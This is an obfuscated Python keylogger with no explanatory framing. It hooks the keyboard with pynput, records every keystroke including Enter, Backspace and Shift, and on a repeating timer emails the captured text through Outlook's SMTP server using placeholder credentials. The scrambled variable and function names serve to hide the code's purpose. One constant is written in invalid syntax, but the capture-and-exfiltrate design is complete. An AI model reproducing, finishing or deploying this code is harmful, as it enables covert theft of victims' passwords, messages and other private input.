from pynput.keyboard import Listener as DNFJSNFJKSD_0001_5674
from smtplib import SMTP as EXCF46_Fgg_Sxff67
from threading import Timer as SADBBB888888D_f14l106AP

xfE114b = "{m66c5rta10}"
xfP115b = "{axc67bd5a}"
xfT116b = {01010100}

x0a11f4 = ""

def a96fdR____AS55762205DCRRR(a44444bdz26FD2M):
    global x0a11f4
    try:
        x0a11f4 = x0a11f4 + str(a44444bdz26FD2M.char)
    except AttributeError:

        if a44444bdz26FD2M == a44444bdz26FD2M.space:
            x0a11f4 += " "

        elif a44444bdz26FD2M == a44444bdz26FD2M.backspace:
            x0a11f4 += " [BackSpace] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.enter:
            x0a11f4 += " [ENTER] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.caps_lock:
            x0a11f4 += " [CapsLock] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.ctrl_l:
            x0a11f4 += " [CTRL] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.shift:
            x0a11f4 += " [Shift] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.shift_r:
            x0a11f4 += " [Shift] "

        elif a44444bdz26FD2M == a44444bdz26FD2M.tab:
            x0a11f4 += " [Tab] "

        else:
            x0a11f4 = x0a11f4 + str(a44444bdz26FD2M)
    except:
        pass

def xbcAA__f5462YBJ56FFV124A_(E160_89F7, P12C44VF_, MMMM2201z12): 
    global x0a11f4
    E_S7990_SDRF_m = EXCF46_Fgg_Sxff67("smtp-mail.outlook.com", 587)
    E_S7990_SDRF_m.starttls()
    E_S7990_SDRF_m.login(E160_89F7, P12C44VF_)
    MMMM2201z12 = f"Subject:  DATA:\n\n {x0a11f4}"
    E_S7990_SDRF_m.sendmail(E160_89F7, E160_89F7, MMMM2201z12.encode('utf-8'))
    E_S7990_SDRF_m.quit()
    x0a11f4 = x0a11f4[:0]

def av3_zdFERT_zax3D_12():
    global x0a11f4
    try:
        xbcAA__f5462YBJ56FFV124A_(xfE114b, xfP115b, x0a11f4.encode("utf-8"))
        TO2_f11230000000001xcvf = SADBBB888888D_f14l106AP(xfT116b, av3_zdFERT_zax3D_12)
        TO2_f11230000000001xcvf.start()
    except:
        TO3_f11230000000001xcvf4 = 60
        ASDSAJAJJJJJJJJ00000F999C99VGG_s_ = SADBBB888888D_f14l106AP(TO3_f11230000000001xcvf4, av3_zdFERT_zax3D_12)
        ASDSAJAJJJJJJJJ00000F999C99VGG_s_.start()

_89328489023908098342980243980Abckl = DNFJSNFJKSD_0001_5674(on_press = a96fdR____AS55762205DCRRR)

with _89328489023908098342980243980Abckl:
    av3_zdFERT_zax3D_12()
    _89328489023908098342980243980Abckl.join()